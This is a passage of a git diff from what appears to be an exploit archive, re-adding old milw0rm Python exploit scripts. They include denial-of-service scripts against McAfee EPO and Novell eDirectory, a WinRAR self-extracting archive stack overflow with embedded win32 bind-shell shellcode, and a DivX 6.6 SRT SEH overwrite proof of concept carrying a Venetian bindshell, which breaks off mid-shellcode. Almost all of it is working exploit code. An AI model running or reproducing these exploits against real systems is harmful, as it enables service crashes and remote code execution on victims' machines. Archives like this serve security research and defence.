import sleep - -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect ( ( sys.argv[1], 8081 ) ) -buff="B"*96000+" HTTP/1.1\r\n" -req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" -expl.send (req) -#data=expl.recv(1024) -#print data -expl.close() - -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect ( ( sys.argv[1], 8081 ) ) -buff="B"*96000+" HTTP/1.1\r\n" -req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" -expl.send (req) -#data=expl.recv(1024) -#print data -expl.close() - -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect ( ( sys.argv[1], 8081 ) ) -buff="B"*96000+" HTTP/1.1\r\n" -req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" -expl.send (req) -#data=expl.recv(1024) -#print data -expl.close() - -while 1: - - expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) - expl.connect ( ( sys.argv[1], 8081 ) ) - buff="B"*243 - req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n' - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - expl.send (req) - data=expl.recv(1024) - print data - expl.close() - - sleep(0.1) - -# milw0rm.com [2008-04-02] +#!/usr/bin/python +# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS +# More than meets the eye +# Discovered and coded by Mati Aharoni +# muts..at..offensive-security.com +# http://www.offensive-security.com/0day/mcafee_again.py.txt + + +# EAX 00840C30 +# ECX 00837830 +# EDX 01EACF18 +# EBX 00004000 +# ESP 01EAFF04 +# EBP 01EAFF38 +# ESI 00837830 +# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA +# EIP 42424242 + +import socket +import os +import sys +from time import sleep + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect ( ( sys.argv[1], 8081 ) ) +buff="B"*96000+" HTTP/1.1\r\n" +req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" +expl.send (req) +#data=expl.recv(1024) +#print data +expl.close() + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect ( ( sys.argv[1], 8081 ) ) +buff="B"*96000+" HTTP/1.1\r\n" +req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" +expl.send (req) +#data=expl.recv(1024) +#print data +expl.close() + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect ( ( sys.argv[1], 8081 ) ) +buff="B"*96000+" HTTP/1.1\r\n" +req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n" +expl.send (req) +#data=expl.recv(1024) +#print data +expl.close() + +while 1: + + expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) + expl.connect ( ( sys.argv[1], 8081 ) ) + buff="B"*243 + req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n' + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + expl.send (req) + data=expl.recv(1024) + print data + expl.close() + + sleep(0.1) + +# milw0rm.com [2008-04-02] diff --git a/platforms/windows/dos/5344.py b/platforms/windows/dos/5344.py index d02c4df7b..06062e74b 100755 --- a/platforms/windows/dos/5344.py +++ b/platforms/windows/dos/5344.py @@ -1,21 +1,21 @@ -#!/usr/bin/python -# Novel eDirectory HTTP DOS -# Discovered and coded by Mati Aharoni -# muts..at..offensive-security.com -# http://www.offensive-security.com/0day/novel-edir.py.txt - -import socket -import os -import sys -from time import sleep - -biff="<"*2048 -print "[*] Payload sent "+ str(len(buff)) -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect ( ( sys.argv[1], 8028 ) ) -expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n') -data=expl.recv(1024) -print data -expl.close() - -# milw0rm.com [2008-04-02] +#!/usr/bin/python +# Novel eDirectory HTTP DOS +# Discovered and coded by Mati Aharoni +# muts..at..offensive-security.com +# http://www.offensive-security.com/0day/novel-edir.py.txt + +import socket +import os +import sys +from time import sleep + +biff="<"*2048 +print "[*] Payload sent "+ str(len(buff)) +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect ( ( sys.argv[1], 8028 ) ) +expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n') +data=expl.recv(1024) +print data +expl.close() + +# milw0rm.com [2008-04-02] diff --git a/platforms/windows/dos/599.py b/platforms/windows/dos/599.py index b315e2909..0a2502abb 100755 --- a/platforms/windows/dos/599.py +++ b/platforms/windows/dos/599.py @@ -28,6 +28,6 @@ try: s.close() print "\nRun this script again, and server should crash." except: - print "\nCould not connect to sever!" - -# milw0rm.com [2004-10-26] + print "\nCould not connect to sever!" + +# milw0rm.com [2004-10-26] diff --git a/platforms/windows/local/1985.py b/platforms/windows/local/1985.py index b087fe5f3..d3a7541ce 100755 --- a/platforms/windows/local/1985.py +++ b/platforms/windows/local/1985.py @@ -1,86 +1,86 @@ -""" -WinRAR - Stack Overflows in SelF - eXtracting Archives -====================================================== - -Tested Version(s)..: WinRAR 3.60 beta 4 -Original Author.............: posidron -Shellcode Stuffing .........: muts - -""" - -import os, sys - -winrar__ = 'C:\WinRAR.exe' -sfxnfo__ = "comment.txt" -result__ = "sample.exe" - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */ - -sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" -sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37" -sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48" -sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58" -sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" -sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" -sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48" -sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54" -sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48" -sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d" -sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48" -sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36" -sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" -sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57" -sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" -sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50" -sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45" -sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" -sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51" -sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a" -sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51" -sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" -sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d" -sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d" -sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46" -sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" -sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36" -sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c" -sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c" -sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32" -sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" -sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f" -sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56" -sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56" -sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46" -sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f" -sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -sc +="\x4f\x4f\x42\x4d\x5a" - -buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2 - -try: - info = open(sfxnfo__, "w+b") - info.write(buf) - info.close() -except IOError: - sys.exit("Error: unable to create: " + sfxnfo__) - -print "Creating archive:", -os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__]) -os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__]) -print "done." -print "Executing:", -# debug only! -#os.spawnv(os.P_WAIT, result__, [result__, ""]) -#print "done." -print "Cleaning up:", -os.remove(sfxnfo__) -print "done." - -# milw0rm.com [2006-07-05] +""" +WinRAR - Stack Overflows in SelF - eXtracting Archives +====================================================== + +Tested Version(s)..: WinRAR 3.60 beta 4 +Original Author.............: posidron +Shellcode Stuffing .........: muts + +""" + +import os, sys + +winrar__ = 'C:\WinRAR.exe' +sfxnfo__ = "comment.txt" +result__ = "sample.exe" + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */ + +sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" +sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37" +sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48" +sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58" +sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" +sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" +sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48" +sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54" +sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48" +sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d" +sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48" +sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36" +sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" +sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57" +sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" +sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50" +sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45" +sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" +sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51" +sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a" +sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51" +sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" +sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d" +sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d" +sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46" +sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" +sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36" +sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c" +sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c" +sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32" +sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f" +sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56" +sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56" +sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46" +sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f" +sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d" +sc +="\x4f\x4f\x42\x4d\x5a" + +buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2 + +try: + info = open(sfxnfo__, "w+b") + info.write(buf) + info.close() +except IOError: + sys.exit("Error: unable to create: " + sfxnfo__) + +print "Creating archive:", +os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__]) +os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__]) +print "done." +print "Executing:", +# debug only! +#os.spawnv(os.P_WAIT, result__, [result__, ""]) +#print "done." +print "Cleaning up:", +os.remove(sfxnfo__) +print "done." + +# milw0rm.com [2006-07-05] diff --git a/platforms/windows/local/5462.py b/platforms/windows/local/5462.py index 2b5f163cb..bb080e5dc 100755 --- a/platforms/windows/local/5462.py +++ b/platforms/windows/local/5462.py @@ -1,165 +1,165 @@ -#!/usr/bin/python -####################################################################### -# DivX 6.6 SRT SEH overwrite PoC -# Tested on XP SP2 -# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD -# muts..at..offensive-security...dot..com -# chris..at..offensive-security...dot..com -# http://www.offensive-security.com/0day/divx66.py.txt -# Notes: Unicode buffer - real pita. -# Greetz to our wives - thanks for the couch! -####################################################################### -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Documents and Settings\Administrator\Desktop> -####################################################################### -# file = name of avi video file -file="infidel.srt" - -# Unicode friendly POP POP RET somewhere in DivX 6.6 -# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods - -ret="\x94\x48" - -# Align stack for register save -nudge="\x48\x6d" - -# Payload building blocks - -buffer="\x41" * 1032 - -xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop - -pushad="\x60\x6d" # Save stack registers,nop - -pushfd="\x9c\x6d" - -align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer - -align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd - -popfd="\x9D\x6D" # popfd,nop - -popad="\x61\x6D"# popad,nop - -padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode - -rest= "\x01" * 5000000 # Buffer and shellcode canvas - -# PoC Venetian Bindshell on port 4444 - ph33r -# Built on alternating 00 01 surface -# Venetian self decoding bindshell - 1580 bytes - -bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer + -"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80" -"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D" -"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40" -"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D" -"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80" -"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE" -"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D" -"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40" -"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D" -"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" -"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF" -"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D" -"\x40\x6D\x80\xBF\x6D\x40\x6D" -"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80" -"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2" -"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D" -"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40" -"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D" -"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80" -"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C" -"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D" -"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02" -"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D" -"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40" -"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D" -"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" -"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F" -"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D" -"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40" -"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D" -"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80" -"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D" -"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40" -"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D" -"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80" -"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67" -"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D" -"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D" -"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80" -"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54" -"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40" -"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D" -"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80" -"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52" -"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D" -"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" -"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80" -"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94" -"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D" -"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40" -"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D" -"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80" -"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3" -"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D" -"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40" -"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D" -"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80" -"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56" -"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D" -"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40" -"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D" -"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80" -"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40" -"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" -"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80" -"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58" -"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D" -"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40" -"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D" 